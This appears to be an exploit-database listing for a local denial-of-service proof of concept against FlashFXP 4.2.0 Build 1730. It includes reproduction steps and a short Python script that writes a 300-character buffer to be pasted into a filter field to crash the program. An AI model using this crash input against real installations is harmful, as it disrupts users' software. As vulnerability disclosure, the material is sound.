header-logo
Suggest Exploit
vendor:
FlashFXP
by:
Paras Bhatia
7.5
CVSS
HIGH
Denial of Service (DoS) Local
CWE
Product Name: FlashFXP
Affected Version From: 4.2.0 Build 1730
Affected Version To: 4.2.0 Build 1730
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro (64 bit)
2020

FlashFXP 4.2.0 Build 1730 – Denial of Service (PoC)

The exploit allows an attacker to cause a denial of service (DoS) by crashing the FlashFXP software. By providing a specially crafted input, the software crashes when attempting to process it, rendering it unresponsive and unavailable.

Mitigation:

Update FlashFXP software to a non-vulnerable version or apply any patches released by the vendor.
Source

Exploit-DB raw data:

# Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC) 
# Vendor Homepage: https://www.flashfxp.com/ 
# Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-03-30
# Vulnerable Software: FlashFXP
# Version: 4.2.0 Build 1730
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 10 Pro (64 bit) 

#Steps to Produce the Crash:

#   1.- Run python code: FlashCrash.py
#   2.- Copy content to clipboard
#   3.- Open "FlashFXP.exe"
#   4.- Go to "Options" > Filters > Skip List > New Entry
#   5.- Paste ClipBoard into the "Mask" field
#   6.- Click on OK
#   7.- Go to "Options" > Filters > Skip List
#   8.- Crashed

#################################################################################################################################################

#Python "FlashCrash.py" Code:
   
buffer = "\x41" * 300
f = open ("FlashCrash.txt", "w")
f.write(buffer)
f.close()